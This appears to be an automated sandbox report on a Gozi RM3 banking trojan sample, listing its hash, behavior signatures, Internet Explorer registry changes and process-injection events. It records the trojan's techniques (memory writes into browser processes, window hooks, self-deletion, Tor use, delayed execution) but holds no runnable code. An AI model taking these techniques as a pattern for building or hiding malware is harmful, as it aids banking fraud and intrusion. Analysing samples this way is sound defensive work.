Malware Analysis Report

2024-10-19 03:00

Sample ID 220315-rdvttscdc3
Target 520636dbbdc33d8dbdf1b14f043b46f8.exe
SHA256 bd8aa280646a2b601ccbd5cec125d51646624d34005eb7db56da6b70fda821cb
Tags
gozi_rm3 banker trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bd8aa280646a2b601ccbd5cec125d51646624d34005eb7db56da6b70fda821cb

Threat Level: Known bad

The file 520636dbbdc33d8dbdf1b14f043b46f8.exe was found to be: Known bad.

Malicious Activity Summary

gozi_rm3 banker trojan

Gozi RM3

Deletes itself

Uses Tor communications

Drops file in System32 directory

Program crash

Modifies Internet Explorer settings

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-15 14:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-15 14:05

Reported

2022-03-15 14:08

Platform

win7-20220310-en

Max time kernel

4294211s

Max time network

158s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi RM3

banker trojan gozi_rm3

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Uses Tor communications

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000848de11a691104a4a7621763c329328b3aafae11240aada6b98e1e8e4316efba000000000e800000000200002000000033961ac82e3b91e722cea73c4c855d66e882ed23618be401c2b7d4a2d835fe6930010000aea24903b1f8b8839e597eb09610f9cea839664384b047fa634ce18a229ed4ced27a94a9bedff63463d0eae5ca54774a9e634d18800389ddd4d6ef383866d50b8c8592ebf76917c6e7f6262c644c5eae283cd21108b2742e5b43e2b728e1dba4054e90cf92954f3410876cb4f2bd0dab0b509f30edcc4ca278230aaf0597b30b535774eb9b0e6104e059eac051e461307b6eb87313924a781b13b3a4afe3894d4595461caddd7f0947c2482dd87804b616669bb200a190ce6273c53e9c99cec9a913667e972bdf3f195c4e447de2ed7a7451cb04727fa4023558ea2711b87e12a949af914d2681b612cf5653f5d8ab7b797bbc880620358241a7ca64702b56ad9b41389312e0e6e2c44dd0faba7c35bb65d2e3aac29db12cd4e2e7375d537fe947cdd6bdf6ae6b2cac346ecfc960eaef400000009f062d4b0dc30d1b6b15907bc63decdf8d49a1277613928f5ee01c2c50698b7c8e9866c17d4b7cbb974b54cc229788159f31d3a192340026c476f3122dd05239 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000c2a6ae86826be4047133c7c7dcc86b768e5ba045c4e15af6aef05b91cf3cba84000000000e8000000002000020000000d33dccbc349c7a3ab621c7e37f5960b05b3564231a365a9f4d9d4bd46b7aac28300100005bb4a93d19191c934a7f1ea60357c5c09a967ea5774a4912fe2fee1b64d094d7eed429f574b4a894c71412d67716503619a39646a5adf8b0bfa52557b6ff22b2153120982dd84b2818c2f0092c2d29b4bdf5457e1ea2856f365b4b36806ed18bb6d1530ab4747944eeeee506edf486738e63c19151cf4e4502364c7dfae22d68cd32a866cd291332eb4a64e61e0cdc1a2940e9b547f8be744f90199096e7d18312be8a6f861388b7d9d6f3b85ea4222845e823e61b771d99697a6d8ab123929a46b38d346e16a2df77d7eec8b116595990fc9aecbfcd16b09ed9948f82a5621a4edad10f71f928370c47e43e4a97cc57274a50bfa143377ab371cbbb40a58aab45b75b68877d16e8e7a3890ceb68c8ee8ab809628efcfd25dc96f5b24ec6ec1c917d02f0978340e27047fab299a87fc640000000845256ab7d3b0aef3dcb07236ed3d63772fac2dc72adafca6ab5d382b095d734b0d53dfe89ad8ac4fd7856d60e264d0d08f05d0ac78af84262526135d46a4919 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e50000000002000000000010660000000100002000000038820fba66496241cf9700077d97233f36089d05dcc089baa312ca1a96d9c2aa000000000e80000000020000200000006b7c7609116fe14d83cdb94adc9834244c3c71c36ccb17ac54e7c9407362d28530010000862b7a0a43c886bba981399e1a1fa564f73a8111600805c429b72c78fba68a4636ab39b63b14c3cdc1975dbd8458800e9cc894f50de0afb8ca796319a176d0b3987ce3d2cb9c6b5049b9b40e8a9e62572486e975b6f08c5c58219fa75013e78f8aedfe970b56e81f1ee38d5f4f288b5d467ffc9e477c6036b4a1866f941dfabcb3a1ea9073e445e7cdeb05d3ef1d975cccb3eafc5248317c418eac650c7e4cdd08ae3c5fb55163d88854c85cc3699cc8a70d8a65d83ea11cb8c8e4ec9930f655689035cf09acf0f9ac84922efe607817599f60e038094ef9473bfd48ac6e7eb92bfa34e1ce861e03998728318c82e11a5a3a9c2981e86ccc8388c2c40487fe71fd2c5c4d593e4e1dd2b0d9ac51fe8c3c90b7c8f5ddff96832756bab41508ec3cdcb755c1976a4d3d0844af32d27574ed400000008e74336338a83c2c2dfbbe6582757fb0cfddda26c078bdd177d1dc7b46613da9d293c0d351e584799d7b6e0474b6f28e8abe8f401ce8b15f0680f9c52954445c C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3200000032000000b804000097020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6400000019000000ea0400007e020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 406df82d7e38d801 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000004da70a2a8d8f657ee493617ead9bfa85ff5a3a40dac172efc4c9069ad3ea209e000000000e8000000002000020000000e4122a9fad8930f138dc068757f584bdb351ae9d297010c6279fa44333f0d31f30010000474375028df37e5a4ca764379726aec4a9856dc73f396be4140a6e6d57c1ae1f902f0962842595965e0986230b281676444065eba59588573d05c03b3edb815290d2357b40effd4ef00deb86a07f4308f9a9efab5eb64d587abe57ca2d73c3ba0705545472c522c9532175c21a55070ccf1e8b080877bcbb07f6eca41196ce7404ae8ebebd7d0b0b043987453de9f74d01a9fffbfce09499c380698dbd12f8fe433b4e086e58b31d0631ad7c645c7272f917c399abe77e0d0e7edbf3e19646570a7fbd711a7b7899f91c4413f343a54ea34b3d54f647228c0dc17d753a8b737577f530598c388601ccb6b08c99420550a405527521a4206db8b233b32c607ddaef4d04f826ee87a771f7e20403b6c457b691870a4cc0a4cfb490adf85cde6597ce4047c806060c0e889fa7d7f5522b3640000000822ef81260457029cf7a39416f17b1e82472dc6f1c4c68333a7c2ea2a1c0637a50cff14c9bf5568a69d8b4a1a9233cfdaf3adbd701d23bc2a4b6ca16b29ec4e9 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{60815881-A471-11EC-ACC4-5A7BB634C6F6} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000fa5acc32a29e8820665400d28932650271f18652831449b5364d513e490d840f000000000e8000000002000020000000e5b77292f411cc1dd3dd2992ac4c0e153201eb4c5391f1304942fbd41e005fcb3001000029ed0abb74debf6443f8f9297ac44d38a27674fec2c1395dcd70e4236f2e1e4aeddb7d110153fdf83aabc2bffcadb01b71b08242c54553691253424fcc70c6e6c14b549556a5170bf1129743fd2f3d1253449430fa3958bbca10ec8f25426dcae2b8a89e755d6464aab57155788472561bc8081d937bec8e7971a0135d4470bdf1dd54ee2d6b09a4d4528fc4318d21ff4f3c39e29ab7c72bae8d13eca45a2a5c1e302313ff5f60aa5692bccdd56b17cc23440029c485e99795143653814328b8a6420f7fc7c9f49f9474367cadf235454ff734efa4e53d1d90c9ed8f8271b3acc8cb2a28eeb89979ed83f3403134036ec62dca8fe25cc5e062365ce4db57150c422e3a524515be0d40ecba8d590ef1c5802542cf501c26abbd9dd64dd1cbb58c48c08afe75e996dca43f968a4802109d4000000040f546d20bb12a27789a07519202d014b2c4c8749c3eb2834a86c597f08fa68d40ad23475e3c828e7c515e9ded1d58dc94d5cb267c7bf01cd64076015346b8e1 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000007164a8aa0278030caad5712525f19cc3b5e421a299aa25615e2712d144b03736000000000e8000000002000020000000de34d9e6a8c8cae055431619d02e81a3c7343c0f7fc1e142c8968139dd736a399000000028659c0277fee02be012aaf72256cd68966795c6fa850f04c61aa0ab94bf8525afcb7d45a6fda3f8cbb76d5bf8067595530e3073608a60058aa340775b966d8f8e2f45da05b298d2f763bf0b1b42df0e3d52d955956f284c5d01fbbb45278974c5a1f43bc2b2215f6eec965aaee911c552487e070b3b4d3b76c21110378ff68be3103d5d7ab68b1adb063b868eaaf8e9400000009a64f00d6404739aaf28608b30263eb34584d8dbb5250cfcbdc610aeab75cedd8df7dd6e7549bd7ee22f13dc46b2785eaca9fd0d2570fbeed4229d06c7529711 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000c0e3c8076960ba661f9913e22f8bee511a511c6341b43d35f84af669ab444989000000000e8000000002000020000000d7cc88cf612901c2668c545b39ce96c22ae1773585c7bda6b1cabca272e8027230010000a55f877eff2bef3f72ab0539bb5f1dd036a4a863139ce845f80ea5104a8eab2b44fa72e271287b05d26051addf4a598215d4909b321ea8442647f828290bff39417317afb869fec6024318d9fdf4545913684ab3a958904c247fb15840a607c65989810b22b0e98534832a9f8a306a3864c4a9f12f485e0206dbb3f8e708c710f2f0761cec570e4bae8c3fbde561b09005d5c2c97f02aaeed3cab739ed54c388871062e16ef1dd09166c037169b115ac02299232b031ce3e1f5e6ba8fe786e9de0a5b9aa34cbe80e58f1e14611aa56f6a652476a80be27a794d4d0a4eb0e5c099b6ae2dffd20cf1857df5775a29cfa578ec3969677d30880be3c4067d045403c56df3ecb2d7475bfbe84b27623051853d6303c17f34438d11df24a71ecf69992b601da0d20083d90d003471cc8bb1f40400000006d22f5a04e32e5a3d8466edeacf932dba5d49c1f8eee51a3663a413f9a0941e0d950101752db7aa20f486c6f425732b3170a950342b394e7f6522523e57deaec C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff4b00000000000000d104000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000c2797f40edac4b31681b03d7d44b72216d8c449a336471011bf238c0fc52c61a000000000e8000000002000020000000f41c85d1de46350762f16ad5549d664ef80e28256772f4783637074a5527187530010000be1bd8744b35b473beb215677ef029eca1384d1f38ab64a155ab9074cb0a9e5e3d2067d9ffbae84c506bf1e2803e3b63a0970c4ea3243c599787ec195f4427348ef919aa1c5102bfb9b4f5e31f84055b9a76c11215fdeef9343cae1f9e36d8d33903204852b9fceb7a2bc6b702a01a075627d40a980e3083af04638aeeb298f6ca205fbb6a76fa6d3bb3a934cbc43935748a7589e4dae69b9e9ad61832e1027943ff96be7ae6e0eb352867d6c4b63e313b2cb2d185f9f609226d6fe199b51f7f7c5dacdaf6aea5efc208aab99affbb23a45b7ff8c0d1de1dbff1e821a824038c0e6fec36092ff182089b63607697e202d4b5c7d77db5ec373a9420cbd5ac88ece960a8d87f2f502aa4985fb1dc3dd8d7e5c1310d1e50c65546db7f5d5f7a6ef7911d47f1e99881683e32a5967adc9a18400000003db41519f06a057313287039bdfa979e80672fdf21599526630f248d60b58f0fd24babb30d4f807e71b09203803895d91bc32d75d5a56e1e62fcb42acdb81a17 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000003c553aceacc9c3d1ea9900fef69b5e4d4ff339bb25ed4baa739946f9d7884d54000000000e800000000200002000000009466dcf8b39ce8940293b538d90e128e01e1b6f9419c346a4934f0985e8a0f22000000003186fea220cdd2ec20d54cf21108ff4371086526455f4c4fdc5c69e09cae2ea40000000532736d937bd0ebe623f6a3d0bdfd550697ab1d05204c1763c0449ed5bfc18ff8df4e18e8b246f0d7148607c3394291e170835115dbea538f2774adea503adfe C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000008d6ab81c0add1a71a83e6d19c1a86685433e44dbd4f93b9eadc54382f5ee8105000000000e8000000002000020000000baa5ae7a34ffe3160257822823aebe40fa4c8aa180f5cb0b95876618eb705857300100001bf98b54daefb1bb44ce44eaa7a36cf75a4adafa801b45316bf42c1e54d1507bcbaff6a5fbd8917ba62150046d5c8d4a6396a45f2a5ff2d8008f0d9c584b825ffb5d1f31db7226ad0c386841963b6fa652859e05911dbda433f5bd5cadb91ae09e387bb3e09681510f8de019c765abebea2aa6d8d9ab038c70390e52d82edc7714175cbc82eb53444865a628b9e2333eaf1ab216d7284c61736c1df03ccf47c03efdc69d4e08659f1de4b64e7717904c7dadaab3f0ec62cac80026276330f00519faeec9054f2f4eb82e12793bc5eb5074e58a9150ca021143d1ef5767d5cf4e2c432ec2cb08bd1ba7585b965c9945119158077dac80db84d0d0acb7dbcf3c6572006be2b2af0d262d0370825c0ad988e19a03d16dbbe3ad3534af466fc705f8b31e0acaaa395a649a709a1dfdaf6fe84000000015d5dd4e0211195b0d8a39d23c4b702108f7289d9611026501a3dba0b3e6929b7a5458a427008f7d6dbe1505362289050631046d61c0d3d24254b5f5bc924fb2 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1936 wrote to memory of 1012 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1936 wrote to memory of 1012 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1936 wrote to memory of 1012 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1936 wrote to memory of 1012 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1936 wrote to memory of 984 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1936 wrote to memory of 984 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
